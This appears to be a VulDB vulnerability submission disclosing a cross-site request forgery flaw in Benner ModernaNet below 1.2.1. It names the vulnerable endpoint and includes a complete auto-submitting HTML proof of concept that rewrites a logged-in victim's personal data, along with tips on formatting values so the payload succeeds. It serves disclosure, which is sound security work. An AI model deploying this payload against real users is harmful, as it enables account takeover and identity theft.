Submit #500575: benner modernanet < 1.2.1 Cross-Site Request Forgeryinfo

Title	benner modernanet < 1.2.1 Cross-Site Request Forgery
Description	Cross-Site Request Forgery leads to Account Take Over on Modernanet (Benner) Description: A Cross-Site Request Forgery (CSRF) vulnerability has been identified in the Modernanet system, developed by Benner. This vulnerability allows an attacker to manipulate sensitive user data, including personal details and contact information, for any authenticated user without their consent. By crafting a malicious page with a specially constructed payload, an attacker can alter personal data such as name, email, CPF, address, and more, for a victim who is currently logged in to the system. Impact: An attacker can modify critical personal information of any logged-in user, which can lead to identity theft, unauthorized changes, and potential exploitation of the victim's account. The attack requires no interaction from the victim other than visiting the malicious page, which makes it a significant security risk. Vulnerable Endpoint: https://.modernanet.com.br/DadosPessoais/SG_Gravar Method: GET Vulnerable Parameters: Various personal data fields (e.g., DADOS_PESSOAIS_USER_NAME, DADOS_PESSOAIS_CPF, etc.) Proof of Concept (PoC): <!DOCTYPE html> <html> <head> <title>PoC CSRF</title> </head> <body onload="document.getElementById('csrfForm').submit()"> <form id="csrfForm" method="GET" action="https://.modernanet.com.br/DadosPessoais/SG_Gravar"> <input type="hidden" name="idItAg" value=""> <input type="hidden" name="idItAgPagto" value=""> <input type="hidden" name="DADOS_PESSOAIS_USER_NAME" value="email@GMAIL.COM"> <input type="hidden" name="DADOS_PESSOAIS_USER_PASSWORD" value=""> <input type="hidden" name="DADOS_PESSOAIS_USER_PASSWORD_RETYPE" value=""> <input type="hidden" name="DADOS_PESSOAIS_IDPESFIS" value="119642"> <input type="hidden" name="DADOS_PESSOAIS_IDPESPLA" value="204354"> <input type="hidden" name="DADOS_PESSOAIS_CPF" value="47455178824"> <input type="hidden" name="DADOS_PESSOAIS_DATANASC_DATE" value="10/10/2000"> <input type="hidden" name="DADOS_PESSOAIS_DATANASC_TIME" value=""> <input type="hidden" name="DADOS_PESSOAIS_NOME" value="TEST"> <input type="hidden" name="DADOS_PESSOAIS_SEXO" value="F"> <input type="hidden" name="DADOS_PESSOAIS_EMPRESA" value="TEST"> <input type="hidden" name="DADOS_PESSOAIS_RG" value="111111111111"> <input type="hidden" name="DADOS_PESSOAIS_CONVENIO" value="11"> <input type="hidden" name="DADOS_PESSOAIS_PLANO" value="5"> <input type="hidden" name="DADOS_PESSOAIS_CODIGO_CONVENIO" value=""> <input type="hidden" name="DADOS_PESSOAIS_PAI" value=""> <input type="hidden" name="DADOS_PESSOAIS_MAE" value="TEST"> <input type="hidden" name="DADOS_PESSOAIS_ENDER_ID" value="0"> <input type="hidden" name="DADOS_PESSOAIS_TIPOEND" value="1"> <input type="hidden" name="txtDADOS_PESSOAIS_CEP" value="A VALID ZIP CODE"> <input type="hidden" name="txtDADOS_PESSOAIS_CIDADE" value="CITY"> <input type="hidden" name="txtDADOS_PESSOAIS_BAIRRO" value="neighborhood"> <input type="hidden" name="DADOS_PESSOAIS_LOGRADOURO" value="STREET"> <input type="hidden" name="DADOS_PESSOAIS_NUMERO" value=""> <input type="hidden" name="DADOS_PESSOAIS_COMPLEMENTO" value=""> <input type="hidden" name="DADOS_PESSOAIS_QTDE_TELEFONES" value="2"> <input type="hidden" name="DADOS_PESSOAIS_FONE_ID_0" value="138552"> <input type="hidden" name="DADOS_PESSOAIS_TIPOFONE_0" value="3"> <input type="hidden" name="DADOS_PESSOAIS_PREFIXO_0" value="12"> <input type="hidden" name="DADOS_PESSOAIS_NUMFONE_0" value="12313-1231"> <input type="hidden" name="DADOS_PESSOAIS_FONE_ID_1" value="138551"> <input type="hidden" name="DADOS_PESSOAIS_TIPOFONE_1" value="1"> <input type="hidden" name="DADOS_PESSOAIS_PREFIXO_1" value="18"> <input type="hidden" name="DADOS_PESSOAIS_NUMFONE_1" value="1081-8923"> <input type="hidden" name="DADOS_PESSOAIS_INT_ID" value="33675"> <input type="hidden" name="DADOS_PESSOAIS_INT_ENDERECO" value="email@GMAIL.COM"> <input type="hidden" name="DADOS_PESSOAIS_INT_PERM" value="S"> <input type="hidden" name="DADOS_PESSOAIS_INT_PREFER" value="[object Object]"> </form> </body> </html> ** It is important to ensure that the input values in the payload meet the specific requirements, such as the correct format for Brazilian CPF, dates, ZIP codes, and other sensitive fields. Otherwise, the payload may not work correctly, as these data need to be formatted according to the server's expectations for the request to be processed successfully. ** By visiting the malicious page, the victim's sensitive information will be updated as defined in the hidden input fields. This can include personal details such as email, CPF, and contact information. By: Yago Martins
Source	⚠️ https://github.com/yago3008/cves
User	y4g0 (UID 80480)
Submission	02/13/2025 05:51 PM (4 months ago)
Moderation	02/24/2025 06:22 PM (11 days later)
Status	Accepted
VulDB Entry	296694 [Benner ModernaNet up to 1.2.0 /DadosPessoais/SG_Gravar idItAg cross-site request forgery]
Points	20

◂ Previous Overview Next ▸

Interested in the pricing of exploits?

See the underground prices here!